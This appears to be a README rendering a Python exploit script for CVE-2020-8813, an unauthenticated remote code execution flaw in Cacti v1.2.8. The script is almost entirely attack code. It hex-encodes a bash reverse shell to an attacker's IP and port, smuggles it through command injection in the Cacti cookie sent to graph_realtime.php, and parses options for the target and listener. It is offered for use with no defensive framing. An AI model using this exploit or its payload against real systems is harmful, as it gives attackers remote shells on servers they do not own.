README.md
Rendering markdown...
#!/usr/bin/python3
# Exploit Title: Cacti v1.2.8 Unauthenticated Remote Code Execution
# Date: 04/21/2021
# Exploit Author: (m4ud)
# CVE: CVE-2020-8813
# Vendor Homepage: https://cacti.net/
# Version: v1.2.8
# Tested on: CentOS 7.3,Ubuntu 16.04, Debian9, Debian 10 / PHP 7.1.33, PHP 7.0
import requests
import sys
import warnings
from bs4 import BeautifulSoup
from urllib.parse import quote
import binascii
from optparse import OptionParser
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
class burning_cactus:
def __init__(self, options):
self.url = options.url
self.lport = options.lport
self.lhost = options.lhost
#proxy = "http://127.0.0.1:8080"
#proxies = { "http" : proxy }
def burn_cacti(self):
shell = "bash -i >&/dev/tcp/%s/%s 0>&1" % (self.lhost, self.lport)
v = binascii.hexlify(bytes(shell, encoding='utf-8')).decode("utf-8")
url = self.url
payload = ";echo${IFS}" + v + "|xxd${IFS}-p${IFS}-r|bash"
print(payload)
cookies = {'Cacti': quote(payload)}
path = url+"/graph_realtime.php?action=init"
print("[+] S3nd1ng 3v1l r3qu3st, SHELL???? [+]")
print("[+] Burn1ng C4ct1!! [+]")
# requests.get(path, cookies=cookies, proxies=proxies)
requests.get(path, cookies=cookies)
def main():
parser = OptionParser()
parser.add_option("-u", "--url", dest="url", help="[ Required ] target URL eg:. http://Cacti/")
parser.add_option("-l", "--lhost", dest="lhost", help="[ Required ] Attacker IP addr")
parser.add_option("-p", "--lport", dest="lport", default=443, help="[ Default 443 ] Attacker IP Port")
(options, args) = parser.parse_args()
if not options.lhost and options.url: # if filename is not given
parser.error('[x] Gonna need both an URL and your IP! [x]')
if options.url:
exploit = burning_cactus(options)
if exploit.burn_cacti():
log("Success! Do i have shell??")
else:
parser.print_help()
if __name__=="__main__":
main()